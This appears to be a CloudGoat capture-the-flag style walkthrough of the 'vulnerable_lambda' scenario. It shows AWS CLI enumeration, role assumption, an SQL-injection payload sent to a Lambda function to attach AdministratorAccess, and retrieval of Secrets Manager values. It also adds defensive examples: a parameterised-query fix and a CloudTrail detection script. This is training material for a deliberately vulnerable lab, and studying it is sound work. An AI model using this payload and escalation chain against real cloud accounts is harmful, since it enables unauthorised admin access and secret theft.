CloudGoat: vulnerable_lambda
May 7, 2024
Note:
- We will be performing our attack via Kali Linux
- Ensure you have completed the prerequisites before you start the lab
1. Preparation
1.1 Launch the scenario:
┌──(root㉿kali)-[~]
└─# cd /opt/cloudgoat
┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py create vulnerable_lambda
1.2 Read the start.txt file
┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd vulnerable_lambda*
┌──(root㉿kali)-[/opt/cloudgoat/vul...]
└─# cat start.txt
Access Key ID = AAAABBBBCCCCDDDD
Access Secret Key = 111122223333
1.3 Create a profile for the bilbo user
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws configure --profile bilbo
AWS Access Key ID: AAAABBBBCCCCDDDD
AWS Secret Access Key: 111122223333
Default region name:
Default output format:
2. Enumeration
2.1 whoami
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws sts get-caller-identity --profile bilbo --region us-east-1
{
"UserId": "...",
"Account": "...",
"Arn": "arn:aws:iam:1234:user/cg-bilbo-vulnerable-lambda-cgidxqb9uign6"
}
- arn = arn:aws:iam:1234:user/cg-bilbo-vulnerable-lambda-cgidxqb9uign6
- username = cg-bilbo-vulnerable-lambda-cgidxqb9uign6
2.2: list the inline policies attached to the user
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam list-user-policies --user-name cg-bilbo-vulnerable-lambda-cgidxqb9uign6 --profile bilbo --region us-east-1
{
"PolicyNames": ["cg-bilbo-vulnerable_lambda_cgidxqb9uign6-standard-user-assumer"]
}
2.3: show the details of the policy
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam get-user-policy --user-name cg-bilbo-vulnerable_lambda_cgidxqb9uign6 --policy-name cg-bilbo-vulnerable_lambda_cgidxqb9uign6-standard-user-assumer --profile bilbo --region us-east-1
{
... ... ...
{
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Resource": "arn:aws:iam:yyy:role/cg-lambda-invoker*",
"Sid": ""
}
... ... ...
}
2.4: list the roles in the account, filtered to the CloudGoat ones (i.e., names starting with “cg-”)
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 iam list-roles | grep cg-
... ... ...
"RoleName": "cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6",
"Arn": "arn:aws:iam:yyy:role/cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6",
... ... ...
2.5: list the policies for that role
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 iam list-role-policies --role-name cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6
{
"PolicyNames": ["lambda-invoker"]
}
3. Exploitation
3.1: assume the role
- FYI, when we assume a role, STS returns a set of temporary security credentials that we can use to access AWS resources we would not otherwise have access to. These temporary credentials consist of an access key ID, a secret access key, and a session token; all three must be presented together.
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 sts assume-role --role-arn arn:aws:iam:yyy:role/cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6 --role-session-name cloudgoat-session1
{
"Credentials": {
"AccessKeyId": "AAA123123",
"SecretAccessKey": "BBB123123",
"SessionToken": "CCC123123",
... ... ...
}
}
- we got the credentials for the CloudGoat role that can invoke the lambda
- let’s create a new profile based on these credentials
3.2: create new profile for the temporary credentials
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws configure --profile vulnlambda
AWS Access Key ID: AAA123123
AWS Secret Access Key: BBB123123
Default region name:
Default output format:
- we only entered the Access Key ID and Secret Access Key, but what about the session token?
- we have to add it to the credentials file manually, because temporary credentials are rejected without it
┌──(root㉿kali)-[/opt/cloudgoat]
└─# mousepad /root/.aws/credentials
┌──(root㉿kali)-[/opt/cloudgoat]
└─# cat /root/.aws/credentials
[...]
... ... ...
[bilbo]
aws_access_key_id = AAAABBBBCCCCDDDD
aws_secret_access_key = 111122223333
[vulnlambda]
aws_access_key_id = AAA123123
aws_secret_access_key = BBB123123
aws_session_token = CCC123123
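The manual edit above is easy to get wrong (a pasted token with a stray newline, or an already-expired set). As an added example, not part of the original post or of CloudGoat, here is a small Python helper that maps assume-role output onto the three keys a credentials-file profile needs, refuses expired credentials, and writes only the named profile, leaving the others intact. The JSON sample is constructed from the placeholder values used in this walkthrough.

```python
import configparser
import json
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Constructed sample: the shape of `aws sts assume-role` output, using the
# placeholder values from this walkthrough (not real credentials).
ASSUME_ROLE_OUTPUT = json.dumps({
    "Credentials": {
        "AccessKeyId": "AAA123123",
        "SecretAccessKey": "BBB123123",
        "SessionToken": "CCC123123",
        "Expiration": "2099-01-01T00:00:00+00:00",
    }
})

def profile_from_assume_role(output_json: str) -> dict:
    """Map AssumeRole credentials onto the keys a credentials-file profile needs.
    All three are required: an AssumeRole access key is rejected without its
    session token, which is why `aws configure` alone is not enough here."""
    creds = json.loads(output_json)["Credentials"]
    if datetime.fromisoformat(creds["Expiration"]) <= datetime.now(timezone.utc):
        raise ValueError("temporary credentials have already expired")
    return {
        "aws_access_key_id": creds["AccessKeyId"],
        "aws_secret_access_key": creds["SecretAccessKey"],
        "aws_session_token": creds["SessionToken"],
    }

def write_profile(path: Path, name: str, section: dict) -> None:
    """Add or replace one [name] profile, leaving other profiles untouched."""
    cfg = configparser.ConfigParser()
    cfg.read(path)                      # a missing file just starts empty
    cfg[name] = section
    path.parent.mkdir(parents=True, exist_ok=True)
    with path.open("w") as fh:
        cfg.write(fh)
    path.chmod(0o600)                   # keep the credentials file private

def demo() -> dict:
    """Write the profile to a temporary file and read it back."""
    target = Path(tempfile.mkdtemp()) / "credentials"
    write_profile(target, "vulnlambda", profile_from_assume_role(ASSUME_ROLE_OUTPUT))
    cfg = configparser.ConfigParser()
    cfg.read(target)
    return dict(cfg["vulnlambda"])
```

Point `write_profile` at ~/.aws/credentials and feed it the real assume-role output to get the same [vulnlambda] block the post shows, session token included.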
3.3: list the lambda functions
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile vulnlambda --region us-east-1 lambda list-functions
{
"Functions": [
{
"FunctionName": "vulnerable_lambda_cgidxqb9quign6-policy_applier_lambda1",
... ... ...
}
]
}
3.4: retrieve the details of that function
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile vulnlambda --region us-east-1 lambda get-function --function-name vulnerable_lambda_cgidxqb9quign6-policy_applier_lambda1
{
"Configuration": {
...
...
"code": "https://xxxyyyzzz",
...
...
}
}
- we found a URL (the download link for the function's deployment package)
- opening that URL downloads a zip file
- unzipping it reveals several source files, one of them main.py
- note line 15, where AdministratorAccess = false, so a plain request for that policy would not be honoured
3.5: send an SQLi payload to the Lambda function
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile vulnlambda --region us-east-1 lambda invoke --function-name vulnerable_lambda_cgidxqb9quign6-policy_applier_lambda1 --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess'"'"' --"], "user_name": "cg-bilbo-vulnerable-lambda-cgidxqb9uign6"}' out.txt
{
"StatusCode": 200
... ... ...
}
┌──(root㉿kali)-[/opt/cloudgoat]
└─# cat out.txt
"All managed policies were applied as expected".
- we have granted the “AdministratorAccess” policy to the bilbo user
- bilbo is now an admin
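To see why the quote-and-comment string in step 3.5 works, and what the fix looks like, here is an added example (my own code, not the lab's main.py, whose source this post does not reproduce): a string-built SQLite lookup beside its parameterised form, run against a constructed policies table in which AdministratorAccess exists but is not flagged public. The schema and rows are assumptions.

```python
import sqlite3

# Constructed policies table modelled on the lab's idea (assumption, not the
# lab's real schema): names the function may apply are flagged public='True';
# AdministratorAccess is present but not public, so it must never be applied.
POLICY_ROWS = [
    ("AmazonSNSReadOnlyAccess", "True"),
    ("AWSLambda_ReadOnlyAccess", "True"),
    ("AdministratorAccess", "False"),
]

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table policies (policy_name text, public text)")
    conn.executemany("insert into policies values (?, ?)", POLICY_ROWS)
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, policy: str) -> list:
    """String-built query: the caller's input is parsed as SQL, so a closing
    quote followed by `--` comments out the public='True' condition."""
    statement = (f"select policy_name from policies "
                 f"where policy_name='{policy}' and public='True'")
    return [row[0] for row in conn.execute(statement)]

def lookup_safe(conn: sqlite3.Connection, policy: str) -> list:
    """Parameterised query: the input is bound as data and never parsed as SQL."""
    statement = "select policy_name from policies where policy_name=? and public='True'"
    return [row[0] for row in conn.execute(statement, (policy,))]

def policies_to_apply(conn, requested: list, lookup=lookup_safe) -> list:
    """Resolve each requested name; only rows the lookup returns get applied."""
    applied = []
    for name in requested:
        applied.extend(lookup(conn, name))
    return applied

if __name__ == "__main__":
    payload = "AdministratorAccess' --"   # the policy_names value sent in step 3.5
    print("vulnerable:", policies_to_apply(make_db(), [payload], lookup_vulnerable))
    print("safe:      ", policies_to_apply(make_db(), [payload], lookup_safe))
```

With the parameterised lookup the payload matches no row and nothing is applied; a second defence is to give the function's execution role no permission to attach AdministratorAccess in the first place.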
3.6: list the secrets in Secrets Manager (back on the bilbo profile, which is now an admin)
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 secretsmanager list-secrets
{
"SecretLists": [
{
"Arn": "arn:aws:secretsmanager:us-east-1:xxx:secret:yyyzzz",
... ... ...
... ... ...
}
]
}
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 secretsmanager get-secret-value --secret-id arn:aws:secretsmanager:us-east-1:xxx:secret:yyyzzz
{
... ... ...
... ... ...
}
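From the defender's side, the trail this scenario leaves in CloudTrail is distinctive: a Lambda execution role, not an administrator, attaches AdministratorAccess to an IAM user, and that user reads a secret minutes later. As an added example (not from the post or from CloudGoat), the check below runs over constructed CloudTrail-style records; the account id, the execution role name, and the assumption that the function applies policies via iam:AttachUserPolicy are mine, not taken from the page.

```python
from datetime import datetime, timedelta

ADMIN_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"

# Constructed CloudTrail-style records, trimmed to the fields used below, that
# replay this scenario: the function's role attaches AdministratorAccess to the
# user, who then reads a secret. Account id, role name and the use of
# AttachUserPolicy are assumptions, not taken from the post.
EVENTS = [
    {"eventTime": "2024-05-07T10:00:00Z", "eventName": "AssumeRole",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/cg-bilbo-vulnerable-lambda-cgidxqb9uign6"},
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6"}},
    {"eventTime": "2024-05-07T10:01:00Z", "eventName": "AttachUserPolicy",
     "userIdentity": {"arn": "arn:aws:sts::123456789012:assumed-role/policy_applier_lambda1-role/vulnerable_lambda_cgidxqb9quign6-policy_applier_lambda1"},
     "requestParameters": {"userName": "cg-bilbo-vulnerable-lambda-cgidxqb9uign6", "policyArn": ADMIN_POLICY}},
    {"eventTime": "2024-05-07T10:03:00Z", "eventName": "GetSecretValue",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/cg-bilbo-vulnerable-lambda-cgidxqb9uign6"},
     "requestParameters": {"secretId": "arn:aws:secretsmanager:us-east-1:123456789012:secret:yyyzzz"}},
]

def parse_time(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")

def admin_grants(events: list, window: timedelta = timedelta(minutes=15)) -> list:
    """Flag every AttachUserPolicy of AdministratorAccess; raise severity when
    the grantee reads Secrets Manager values within `window` of the grant.
    `granted_by` being an assumed-role session of a function is the tell."""
    findings = []
    for grant in events:
        if grant["eventName"] != "AttachUserPolicy":
            continue
        if grant["requestParameters"].get("policyArn") != ADMIN_POLICY:
            continue
        grantee = grant["requestParameters"]["userName"]
        t0 = parse_time(grant["eventTime"])
        reads = [e for e in events
                 if e["eventName"] == "GetSecretValue"
                 and e["userIdentity"]["arn"].endswith(":user/" + grantee)
                 and t0 <= parse_time(e["eventTime"]) <= t0 + window]
        findings.append({
            "grantee": grantee,
            "granted_by": grant["userIdentity"]["arn"],
            "secret_reads": len(reads),
            "severity": "critical" if reads else "high",
        })
    return findings

if __name__ == "__main__":
    for finding in admin_grants(EVENTS):
        print(finding)
```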
4. Clean up
┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py destroy vulnerable_lambda
Destroy "xxx" ? [y/n]: y